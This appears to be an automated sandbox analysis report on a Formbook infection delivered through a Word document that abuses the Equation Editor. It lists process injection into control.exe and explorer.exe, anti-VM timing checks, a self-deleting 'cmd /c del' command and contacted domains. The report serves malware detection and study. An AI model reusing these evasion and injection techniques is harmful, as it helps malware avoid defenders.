          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419DFD NtReadFile,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419E7A NtClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exe | Code function: 5_1_00419F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_021400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_021407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0213FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140078 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140060 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02141148 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02141930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02141D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099E00 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099E80 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099D4C NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099DFD NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099E7A NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_004793CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00479862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_004793D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00479DAE NtResumeThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0041BBD0 appears 38 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0093DF5C appears 124 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0098373B appears 248 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 009AF970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 00983F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0093E2A8 appears 58 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0214DF5C appears 119 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0214E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 021BF970 appears 84 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0219373B appears 245 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 02193F92 appears 132 times
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@10/12@5/2
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$B00028487364 -000487449287.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC4F3.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: AWB00028487364 -000487449287.docVirustotal: Detection: 30%
          Source: AWB00028487364 -000487449287.docReversingLabs: Detection: 36%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: control.pdb source: prosper3512.exe, 00000005.00000002.2161047625.00000000025D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: prosper3512.exe, control.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeUnpacked PE file: 5.2.prosper3512.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_72FE2F60 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041D82F push dword ptr [3253D521h]; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00417A8C push eax; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00407B24 push ss; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00407CB2 push edx; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CEF2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CEFB push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_004176A2 pushfd ; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CEA5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_004176BA push ds; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041CF5C push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093DFA1 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_004176A2 pushfd ; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_004176BA push ds; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041D82F push dword ptr [3253D521h]; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00417A8C push eax; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00407B24 push ss; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00407CB2 push edx; retf
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CEF2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CEFB push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CEA5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041CF5C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000976A2 pushfd ; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000976BA push ds; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00097A8C push eax; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00087B24 push ss; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00087CB2 push edx; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009DD8E push dword ptr [3253D521h]; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009CEFB push eax; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeFile created: C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00409A80 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2928Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 2908Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: prosper3512.exe, 00000005.00000003.2146169272.000000000055F000.00000004.00000001.sdmpBinary or memory string: Vmciwave.dll
          Source: explorer.exe, 00000006.00000000.2089134923.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2097033835.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2097033835.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: prosper3512.exe, 00000004.00000002.2086434172.0000000000614000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: prosper3512.exe, 00000005.00000003.2146169272.000000000055F000.00000004.00000001.sdmpBinary or memory string: 9Vmciseq.dll
          Source: explorer.exe, 00000006.00000000.2089218347.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00409A80 rdtsc
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.pwagih.com
          Source: C:\Windows\explorer.exeDomain query: www.skip1-dndasasd.com
          Source: C:\Windows\explorer.exeDomain query: www.centerstageacademyaz.com
